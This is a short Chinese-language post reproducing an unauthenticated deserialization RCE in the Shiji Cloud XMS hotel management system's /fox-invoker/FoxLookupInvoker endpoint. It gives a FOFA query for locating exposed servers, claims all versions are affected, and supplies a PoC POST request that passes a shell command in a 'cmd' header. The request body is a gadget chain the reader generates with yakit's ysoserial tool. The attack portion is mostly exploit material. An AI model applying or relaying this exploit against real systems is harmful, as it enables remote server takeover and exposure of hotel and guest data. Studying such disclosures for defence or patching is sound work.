西软云XMS 反序列化RCE漏洞复现

发布时间:2023年12月29日

0x01 产品简介

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。

0x02 漏洞概述

西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。

0x03 影响范围

 所有版本

0x04 复现环境

FOFA:app="shiji-西软云XMS"

0x05 漏洞复现

PoC

POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
cmd: whoami

{
  {hexdec(cb18x的序列化链)}}

使用yakit自带的yso生成CommonsBeanutils183NOCC链

文章来源:https://blog.csdn.net/qq_41904294/article/details/135280638
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。